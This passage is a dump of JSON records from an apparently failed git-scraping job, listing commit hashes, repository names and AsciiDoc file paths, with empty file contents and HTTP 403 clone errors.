,qwerty4030\/elasticsearch,kalburgimanjunath\/elasticsearch,mjhennig\/elasticsearch,strapdata\/elassandra,davidvgalbraith\/elasticsearch,Siddartha07\/elasticsearch,wbowling\/elasticsearch,cwurm\/elasticsearch,Helen-Zhao\/elasticsearch,drewr\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,diendt\/elasticsearch,franklanganke\/elasticsearch,dpursehouse\/elasticsearch,sposam\/elasticsearch,drewr\/elasticsearch,gmarz\/elasticsearch,Liziyao\/elasticsearch,markwalkom\/elasticsearch,mmaracic\/elasticsearch,adrianbk\/elasticsearch,sdauletau\/elasticsearch,vingupta3\/elasticsearch,Fsero\/elasticsearch,snikch\/elasticsearch,areek\/elasticsearch,mm0\/elasticsearch,gingerwizard\/elasticsearch,mbrukman\/elasticsearch,humandb\/elasticsearch,huanzhong\/elasticsearch,Shepard1212\/elasticsearch,ulkas\/elasticsearch,hafkensite\/elasticsearch,nilabhsagar\/elasticsearch,acchen97\/elasticsearch,liweinan0423\/elasticsearch,rmuir\/elasticsearch,mgalushka\/elasticsearch,snikch\/elasticsearch,zeroctu\/elasticsearch,jeteve\/elasticsearch,dpursehouse\/elasticsearch,Ansh90\/elasticsearch,18098924759\/elasticsearch,apepper\/elasticsearch,apepper\/elasticsearch,lydonchandra\/elasticsearch,iamjakob\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,queirozfcom\/elasticsearch,mortonsykes\/elasticsearch,hirdesh2008\/elasticsearch,HarishAtGitHub\/elasticsearch,dylan8902\/elasticsearch,lydonchandra\/elasticsearch,zhiqinghuang\/elasticsearch,sneivandt\/elasticsearch,JervyShi\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,JackyMai\/elasticsearch,MetSystem\/elasticsearch,diendt\/elasticsearch,kubum\/elasticsearch,Stacey-Gammon\/elasticsearch,kingaj\/elasticsearch,gmarz\/elasticsearch,nellicus\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,jimhooker2002\/elasticsearch,maddin2016\/elasticsearch,maddin2016\/elasticsearch,queirozfcom\/elasticsearch,dataduke\/elasticsearch,jpountz\/elasticsearch,kubum\/elasticsearch,kubum\/elasticsearch,18098924759\/elasticsearch,F0lha\/elasticsearch,KimTaehee\/elasticsearch,cnfire\/elasticsearch-1,masaruh\/elasticsearch,kunallimaye\/elasticsearch,kubum\/elasticsearch,pranavraman\/elasticsearch,cnfire\/elasticsearch-1,s1monw\/elasticsearch,truemped\/elasticsearch,karthikjaps\/elasticsearch,wayeast\/elasticsearch,martinstuga\/elasticsearch,artnowo\/elasticsearch,masterweb121\/elasticsearch,jchampion\/elasticsearch,fekaputra\/elasticsearch,MichaelLiZhou\/elasticsearch,wayeast\/elasticsearch,iacdingping\/elasticsearch,wittyameta\/elasticsearch,petabytedata\/elasticsearch,winstonewert\/elasticsearch,mnylen\/elasticsearch,beiske\/elasticsearch,kenshin233\/elasticsearch,episerver\/elasticsearch,yongminxia\/elasticsearch,iamjakob\/elasticsearch,achow\/elasticsearch,geidies\/elasticsearch,wayeast\/elasticsearch,gingerwizard\/elasticsearch,wittyameta\/elasticsearch,ivansun1010\/elasticsearch,lks21c\/elasticsearch,dongjoon-hyun\/elasticsearch,TonyChai24\/ESSource,TonyChai24\/ESSource,rlugojr\/elasticsearch,nrkkalyan\/elasticsearch,strapdata\/elassandra-test,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,awislowski\/elasticsearch,nknize\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Fsero\/elasticsearch,Fsero\/elasticsearch,kingaj\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,tebriel\/elasticsearch,ulkas\/elasticsearch,umeshdangat\/elasticsearch,kunallimaye\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra-test,hanswang\/elasticsearch,gmarz\/elasticsearch,umeshdanga
t\/elasticsearch,vietlq\/elasticsearch,weipinghe\/elasticsearch,kingaj\/elasticsearch,yongminxia\/elasticsearch,ricardocerq\/elasticsearch,pritishppai\/elasticsearch,dpursehouse\/elasticsearch,karthikjaps\/elasticsearch,jeteve\/elasticsearch,ImpressTV\/elasticsearch,kubum\/elasticsearch,ricardocerq\/elasticsearch,tebriel\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,markharwood\/elasticsearch,ouyangkongtong\/elasticsearch,myelin\/elasticsearch,mute\/elasticsearch,davidvgalbraith\/elasticsearch,linglaiyao1314\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,lmtwga\/elasticsearch,AndreKR\/elasticsearch,vroyer\/elassandra,acchen97\/elasticsearch,Uiho\/elasticsearch,truemped\/elasticsearch,springning\/elasticsearch,kalburgimanjunath\/elasticsearch,iacdingping\/elasticsearch,rlugojr\/elasticsearch,amit-shar\/elasticsearch,apepper\/elasticsearch,martinstuga\/elasticsearch,dataduke\/elasticsearch,vingupta3\/elasticsearch,fforbeck\/elasticsearch,jpountz\/elasticsearch,lightslife\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,F0lha\/elasticsearch,djschny\/elasticsearch,jchampion\/elasticsearch,zeroctu\/elasticsearch,caengcjd\/elasticsearch,Liziyao\/elasticsearch,AndreKR\/elasticsearch,yanjunh\/elasticsearch,djschny\/elasticsearch,kevinkluge\/elasticsearch,camilojd\/elasticsearch,wayeast\/elasticsearch,dylan8902\/elasticsearch,cwurm\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,lmtwga\/elasticsearch,hydro2k\/elasticsearch,Rygbee\/elasticsearch,yanjunh\/elasticsearch,knight1128\/elasticsearch,18098924759\/elasticsearch,gingerwizard\/elasticsearch,Charlesdong\/elasticsearch,jango2015\/elasticsearch,brandonkearby\/elasticsearch,yongminxia\/elasticsearch,wangtuo\/elasticsearch,rmuir\/elasticsearch,mcku\/elasticsearch,rmuir\/elasticsearch,markwalkom\/elasticsearch,apepper\/elasticsearch,sarwarbhuiyan\/elasticsearch,acchen97\/elasticsearch","old_file":"docs\/reference\/index-modules\/allocation\/delayed.asciidoc","new_file":"docs\/reference\/index-modules\/allocation\/delayed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4b8d4489e1e8167da65cb1375290d97dda4d465","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,apache\/camel,pax95\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6cda3e875cf666a4e940150466e3e263b9b3c24b","subject":"Update 
2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76071469ce841090ed7514c1662cec9c3b358e31","subject":"Update 2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","message":"Update 2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","new_file":"_posts\/2017-09-09-Ascii-Doc-is-Writing-Zen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875ca558f37a2220872d382d82f745c74b37a22d","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90d59105109bc616b8c5823fb2e6cdd269219f0b","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a048e5160052dfa061feebaf42a012a648101a8","subject":"Common snippet multitenancy-transforms","message":"Common snippet multitenancy-transforms","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-multitenancytransforms.adoc","new_file":"src\/main\/docs\/common-multitenancytransforms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3464e10bd73aeace0467fea59822faf63ec01a06","subject":"Add a guide howto deploy quarkus to heroku.","message":"Add a guide howto deploy quarkus to heroku.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/deploying-to-heroku.adoc","new_file":"docs\/src\/main\/asciidoc\/deploying-to-heroku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c2e69e876e9cec7fe20261c34f43b90325b3867","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4aa7bfd4b9a6ef98e87d1094d72d553294883afb","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540dedf9a97ea8ad92f0dac25094bd11b8e0426d","subject":"Job: 11455","message":"Job: 11455\n\nAdd initial draft of ant\n","repos":"xtuml\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11455_deployments\/11455_deployments_scenarios.ant.adoc","new_file":"doc-bridgepoint\/notes\/11455_deployments\/11455_deployments_scenarios.ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"42480cafeef28098ac3987972669f8b2ccd8f23a","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84388f573f69b3e6d7df1714582ae851b35de15f","subject":"Update 2016-07-11-Destruktion-homogener-Selbstbilder.adoc","message":"Update 2016-07-11-Destruktion-homogener-Selbstbilder.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-11-Destruktion-homogener-Selbstbilder.adoc","new_file":"_posts\/2016-07-11-Destruktion-homogener-Selbstbilder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2dc43983f4cff10e582439534e20e11defdd51d","subject":"Renamed '_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc' to '_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc'","message":"Renamed '_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc' to '_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc","new_file":"_posts\/2019-10-01-test-How-to-Make-Tools-in-Unreal-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b2e3f2cb1b16d109ff3eb81b6c2cc71a91b8af1","subject":"y2b create post You Choose My New Look","message":"y2b create post You Choose My New Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-10-You-Choose-My-New-Look.adoc","new_file":"_posts\/2016-10-10-You-Choose-My-New-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"818d5ec75630164f4c60cea5322c59815b746781","subject":"Update 2018-02-02-Web-R-T-C.adoc","message":"Update 2018-02-02-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-Web-R-T-C.adoc","new_file":"_posts\/2018-02-02-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fe563694d4ba012fa564398af621b8622af9b4","subject":"y2b create post How To Charge Your Phone With 
Fire!","message":"y2b create post How To Charge Your Phone With Fire!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-05-How-To-Charge-Your-Phone-With-Fire.adoc","new_file":"_posts\/2017-04-05-How-To-Charge-Your-Phone-With-Fire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d14a03db385f8ab6943bbf852c2b3c7184268e","subject":"Update 2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","message":"Update 2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","new_file":"_posts\/2015-08-28-AutoIt3-script-to-seamlessly-loop-videos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f815f1878bf2dcd4b73de9ef94c05bbb652f4b1","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28be20dd8936cf0e2396e6440863fe508b13cde5","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bc016d33088777ac67faccf8c9d970ab67c66fe","subject":"Added camel 2.17.7 release notes to docs","message":"Added camel 2.17.7 release notes to 
docs\n","repos":"christophd\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,davidkarlsen\/camel,pmoerenhout\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,tadayosi\/camel,cunningt\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,pax95\/camel,nicolaferraro\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,zregvart\/camel,objectiser\/camel,christophd\/camel,adessaigne\/camel,sverkera\/camel,kevinearls\/camel,pax95\/camel,tadayosi\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,pmoerenhout\/camel,tadayosi\/camel,jamesnetherton\/camel,tadayosi\/camel,ullgren\/camel,alvinkwekel\/camel,jamesnetherton\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,jamesnetherton\/camel,tdiesler\/camel,apache\/camel,alvinkwekel\/camel,pmoerenhout\/camel,davidkarlsen\/camel,pax95\/camel,kevinearls\/camel,nikhilvibhav\/camel,gnodet\/camel,nicolaferraro\/camel,tdiesler\/camel,Fabryprog\/camel,sverkera\/camel,nicolaferraro\/camel,apache\/camel,DariusX\/camel,anoordover\/camel,jamesnetherton\/camel,pax95\/camel,adessaigne\/camel,onders86\/camel,pax95\/camel,anoordover\/camel,cunningt\/camel,sverkera\/camel,objectiser\/camel,apache\/camel,cunningt\/camel,christophd\/camel,onders86\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,tdiesler\/camel,ullgren\/camel,CodeSmell\/camel,christophd\/camel,pax95\/camel,zregvart\/camel,Fabryprog\/camel,sverkera\/camel,davidkarlsen\/camel,apache\/camel,alvinkwekel\/camel,zregvart\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,CodeSmell\/camel,DariusX\/camel,DariusX\/camel,Fabryprog\/camel,pmoerenhout\/camel,kevinearls\/camel,onders86\/camel,tdiesler\/camel,onders86\/camel,CodeSmell\/camel,ullgren\/camel,adessaigne\/camel,davidkarlsen\/camel,apache\/camel,anoordover\/camel,tdiesler\/camel,onders86\/camel,anoordover\/camel,anoordover\/camel,objectiser\/camel,Fabryprog\/camel,gnodet\/camel,kevinearls\/camel,cunningt\/camel,mcollovati\/camel,jamesnetherton\/camel,mcollovati\/camel,kevinearls\/camel,kevinearls\/camel,onders86\/camel,apache\/camel,adessaigne\/camel,ullgren\/camel,objectiser\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2177-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2177-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c9f375c5357e3fb0f2ffdd645853a6518a94be2","subject":"Update 2015-05-16-Faustino-loeza-Perez2.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez2.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez2.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a5dbc7d18331371116679050aaadfb926692839","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 
2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef0039b549c6662ab81e2269c707afb1e82288be","subject":"Renamed '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc' to '_posts\/2017-09-30-Web-Developer-Courses.adoc'","message":"Renamed '_posts\/2017-09-30-Front-End-Web-Developer-Courses.adoc' to '_posts\/2017-09-30-Web-Developer-Courses.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Web-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Web-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc92a8b1b614c06d4c12cf58f5fdceeb1ee7030","subject":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","message":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af140991dfc03e9c5ff20af107aefcf27444cbc","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dd7413a679935feacd2609d3e5ca412357e32b5","subject":"Update 2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","message":"Update 2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","new_file":"_posts\/2017-03-23-Factor-RSA-public-key-knowing-LSB-or-MSB-of-private-key.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 
